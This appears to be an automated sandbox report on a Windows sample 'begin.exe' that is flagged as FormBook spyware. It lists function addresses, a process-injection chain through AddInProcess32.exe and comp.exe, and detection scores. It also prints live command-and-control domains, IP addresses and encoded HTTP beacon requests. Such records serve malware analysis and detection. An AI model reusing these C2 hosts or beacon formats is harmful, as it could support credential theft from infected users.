Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011FFB76	11_2_011FFB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0115FB80	11_2_0115FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011B5BF0	11_2_011B5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0117DBF9	11_2_0117DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011FFA49	11_2_011FFA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011F7A46	11_2_011F7A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011B3A6C	11_2_011B3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011DDAAC	11_2_011DDAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01185AA0	11_2_01185AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011E1AA3	11_2_011E1AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011EDAC6	11_2_011EDAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011F1D5A	11_2_011F1D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01143D40	11_2_01143D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011F7D73	11_2_011F7D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0115FDC0	11_2_0115FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011B9C32	11_2_011B9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011FFCF2	11_2_011FFCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011FFF09	11_2_011FFF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01141F92	11_2_01141F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011FFFB1	11_2_011FFFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01103FD2	11_2_01103FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01103FD5	11_2_01103FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01149EB0	11_2_01149EB0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039B03E6	14_2_039B03E6
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038FE3F0	14_2_038FE3F0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039AA352	14_2_039AA352
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039702C0	14_2_039702C0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03990274	14_2_03990274
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039B01AA	14_2_039B01AA
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039A41A2	14_2_039A41A2
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039A81CC	14_2_039A81CC
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0398A118	14_2_0398A118
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038E0100	14_2_038E0100
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03978158	14_2_03978158
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03982000	14_2_03982000
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03914750	14_2_03914750
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038F0770	14_2_038F0770
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0390C6E0	14_2_0390C6E0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039B0591	14_2_039B0591
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038F0535	14_2_038F0535
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0399E4F6	14_2_0399E4F6
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03994420	14_2_03994420
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039A2446	14_2_039A2446
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039A6BD7	14_2_039A6BD7
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039AAB40	14_2_039AAB40
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038EEA80	14_2_038EEA80
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038F29A0	14_2_038F29A0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039BA9A6	14_2_039BA9A6
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03906962	14_2_03906962
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038D68B8	14_2_038D68B8
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0391E8F0	14_2_0391E8F0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038F2840	14_2_038F2840
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038FA840	14_2_038FA840
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0396EFA0	14_2_0396EFA0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038E2FC8	14_2_038E2FC8
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038FCFE0	14_2_038FCFE0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03910F30	14_2_03910F30
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03992F30	14_2_03992F30
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03932F28	14_2_03932F28
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03964F40	14_2_03964F40
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03902E90	14_2_03902E90
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039ACE93	14_2_039ACE93
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039AEEDB	14_2_039AEEDB
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039AEE26	14_2_039AEE26
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038F0E59	14_2_038F0E59
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03908DBF	14_2_03908DBF
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038EADE0	14_2_038EADE0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0398CD1F	14_2_0398CD1F
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038FAD00	14_2_038FAD00
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03990CB5	14_2_03990CB5
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038E0CF2	14_2_038E0CF2
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038F0C00	14_2_038F0C00
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0393739A	14_2_0393739A
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039A132D	14_2_039A132D
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038DD34C	14_2_038DD34C
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038F52A0	14_2_038F52A0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0390B2C0	14_2_0390B2C0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039912ED	14_2_039912ED
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038FB1B0	14_2_038FB1B0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039BB16B	14_2_039BB16B
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0392516C	14_2_0392516C
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038DF172	14_2_038DF172
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038F70C0	14_2_038F70C0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0399F0CC	14_2_0399F0CC
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039A70E9	14_2_039A70E9
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039AF0E0	14_2_039AF0E0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039AF7B0	14_2_039AF7B0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039A16CC	14_2_039A16CC
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03935630	14_2_03935630
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0398D5B0	14_2_0398D5B0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039B95C3	14_2_039B95C3
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039A7571	14_2_039A7571
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039AF43F	14_2_039AF43F
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038E1460	14_2_038E1460
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0390FB80	14_2_0390FB80
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03965BF0	14_2_03965BF0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0392DBF9	14_2_0392DBF9
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039AFB76	14_2_039AFB76
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03935AA0	14_2_03935AA0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0398DAAC	14_2_0398DAAC
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03991AA3	14_2_03991AA3
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0399DAC6	14_2_0399DAC6
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039AFA49	14_2_039AFA49
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039A7A46	14_2_039A7A46
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03963A6C	14_2_03963A6C
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03985910	14_2_03985910
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0390B950	14_2_0390B950
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038F9950	14_2_038F9950
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038F38E0	14_2_038F38E0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0395D800	14_2_0395D800
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038F1F92	14_2_038F1F92
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039AFFB1	14_2_039AFFB1
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038B3FD2	14_2_038B3FD2
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038B3FD5	14_2_038B3FD5
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039AFF09	14_2_039AFF09
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038F9EB0	14_2_038F9EB0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_0390FDC0	14_2_0390FDC0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039A1D5A	14_2_039A1D5A
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038F3D40	14_2_038F3D40
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039A7D73	14_2_039A7D73
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039AFCF2	14_2_039AFCF2
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03969C32	14_2_03969C32
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030B1DF0	14_2_030B1DF0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030AAFF5	14_2_030AAFF5
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030AAEAD	14_2_030AAEAD
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030AAEB0	14_2_030AAEB0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030ACEB0	14_2_030ACEB0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030ACC87	14_2_030ACC87
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030ACC90	14_2_030ACC90
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030AB000	14_2_030AB000
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030B3659	14_2_030B3659
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030B36A0	14_2_030B36A0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030B54A0	14_2_030B54A0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030CBAB0	14_2_030CBAB0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_036FE3D5	14_2_036FE3D5
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_036FE4F4	14_2_036FE4F4
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_036FCB71	14_2_036FCB71
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_036FCBE8	14_2_036FCBE8
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_036FD958	14_2_036FD958
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_036FE88C	14_2_036FE88C

Source: C:\Windows\SysWOW64\comp.exe	Code function: String function: 0396F290 appears 105 times
Source: C:\Windows\SysWOW64\comp.exe	Code function: String function: 03925130 appears 58 times
Source: C:\Windows\SysWOW64\comp.exe	Code function: String function: 038DB970 appears 280 times
Source: C:\Windows\SysWOW64\comp.exe	Code function: String function: 03937E54 appears 111 times
Source: C:\Windows\SysWOW64\comp.exe	Code function: String function: 0395EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 011BF290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 011AEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 01187E54 appears 111 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 01175130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 0112B970 appears 280 times

Source: begin.exe

Static PE information: invalid certificate

Source: begin.exe, 00000000.00000000.1229546152.0000000000A3E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNamexrecovery_installer.exe4 vs begin.exe
Source: begin.exe, 00000000.00000002.1883190709.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs begin.exe
Source: begin.exe, 00000000.00000002.1898946786.0000000005950000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFalimotin.dll4 vs begin.exe
Source: begin.exe, 00000000.00000002.1891732318.0000000004396000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNamexrecovery_installer.exe4 vs begin.exe
Source: begin.exe, 00000000.00000002.1906448272.00000000082B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRP8SH.dll6 vs begin.exe
Source: begin.exe, 00000000.00000002.1891732318.0000000004256000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNamexrecovery_installer.exe4 vs begin.exe
Source: begin.exe	Binary or memory string: OriginalFileNamexrecovery_installer.exe4 vs begin.exe

Source: begin.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: begin.exe, j9MAp5g4.cs	Cryptographic APIs: 'CreateDecryptor'
Source: begin.exe, i4BWg9r1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: begin.exe, Qt62JbAr.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@17/2@3/2

Source: C:\Users\user\Desktop\begin.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\begin.exe.log

Source: http://www.kdrqcyusevx.info/z84n/	Avira URL Cloud: Label: malware
Source: http://www.kdrqcyusevx.info/z84n/?68ZDJP=o7gPcljrbuMGgdsd1LsQM10lReUDL49ypO1I11GlE9lyPwKxV3D/8LWT1eQFq4eHx6tatYqwXiNpfkH1tWmFEu8+AQQ9oryPELiqSvHC/WMcIDoq6daKMeU=&G4JD=1Deh6h3H	Avira URL Cloud: Label: malware

Source: begin.exe	Virustotal: Detection: 69%			Perma Link
Source: begin.exe	ReversingLabs: Detection: 52%

Source:	Binary string: AddInProcess32.pdb source: comp.exe, 0000000E.00000002.2478515912.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 0000000E.00000002.2475910554.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, fMCYiMEFQZmFBs7vgZ5.exe, 0000000F.00000002.2478159799.00000000029EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.2295964160.00000000383CC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: comp.pdb source: AddInProcess32.exe, 0000000B.00000002.1978909211.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, fMCYiMEFQZmFBs7vgZ5.exe, 0000000D.00000003.1920210364.0000000001114000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comp.pdbGCTL source: AddInProcess32.exe, 0000000B.00000002.1978909211.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, fMCYiMEFQZmFBs7vgZ5.exe, 0000000D.00000003.1920210364.0000000001114000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000B.00000002.1979815612.0000000001100000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000E.00000003.1978689528.0000000003542000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000E.00000002.2478005668.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000E.00000003.1980925950.00000000036FC000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000E.00000002.2478005668.00000000038B0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 0000000B.00000002.1979815612.0000000001100000.00000040.00001000.00020000.00000000.sdmp, comp.exe, comp.exe, 0000000E.00000003.1978689528.0000000003542000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000E.00000002.2478005668.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000E.00000003.1980925950.00000000036FC000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000E.00000002.2478005668.00000000038B0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: AddInProcess32.pdbpw source: comp.exe, 0000000E.00000002.2478515912.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 0000000E.00000002.2475910554.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, fMCYiMEFQZmFBs7vgZ5.exe, 0000000F.00000002.2478159799.00000000029EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.2295964160.00000000383CC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fMCYiMEFQZmFBs7vgZ5.exe, 0000000D.00000000.1900733856.000000000073F000.00000002.00000001.01000000.00000009.sdmp, fMCYiMEFQZmFBs7vgZ5.exe, 0000000F.00000002.2476197228.000000000073F000.00000002.00000001.01000000.00000009.sdmp

Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_061A2340
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_061A2338
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_06430F40
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_06430F78
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_06725438
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_06728098
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_06728098
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_06727998
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then xor edx, edx	0_2_06727FD0
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then xor edx, edx	0_2_06727FC5
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_06727D78
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_06727D78
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_06727D6C
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_06727D6C
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_06727A34
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_06727A28
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_06727A1C
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_06727BFD
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_0672808C
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_0672808C
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_067279BD
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	0_2_082A1AA0
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	0_2_082A19EF
Source: C:\Users\user\Desktop\begin.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	0_2_082A1A50
Source: C:\Windows\SysWOW64\comp.exe	Code function: 4x nop then xor eax, eax	14_2_030A9F70
Source: C:\Windows\SysWOW64\comp.exe	Code function: 4x nop then pop edi	14_2_030AE306
Source: C:\Windows\SysWOW64\comp.exe	Code function: 4x nop then mov ebx, 00000004h	14_2_036F04DE

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49724 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49724 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49726 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49728 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49727 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49728 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49729 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49730 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49725 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49731 -> 13.248.169.48:80

Source:	DNS query: www.micusa.xyz
Source:	DNS query: www.layunin.xyz

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ahh1/?68ZDJP=KgTfi8spYvzwzQCi0nAt05PRXpsO+aMWdjR26M6JFm/rOdHTxS9xt0VUcOp0bQ6oIdUEaOE2WIe6UlLp36wVzBq7xf/BNe8xVQN6dj7ilBHEaGiO0pOHz4A=&G4JD=1Deh6h3H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.micusa.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG GT-I9301I Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /z84n/?68ZDJP=o7gPcljrbuMGgdsd1LsQM10lReUDL49ypO1I11GlE9lyPwKxV3D/8LWT1eQFq4eHx6tatYqwXiNpfkH1tWmFEu8+AQQ9oryPELiqSvHC/WMcIDoq6daKMeU=&G4JD=1Deh6h3H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.kdrqcyusevx.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG GT-I9301I Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.micusa.xyz
Source: global traffic	DNS traffic detected: DNS query: www.kdrqcyusevx.info
Source: global traffic	DNS traffic detected: DNS query: www.layunin.xyz

Source: unknown	Process created: C:\Users\user\Desktop\begin.exe "C:\Users\user\Desktop\begin.exe"
Source: C:\Users\user\Desktop\begin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\begin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\begin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\begin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\begin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\begin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	Process created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\begin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
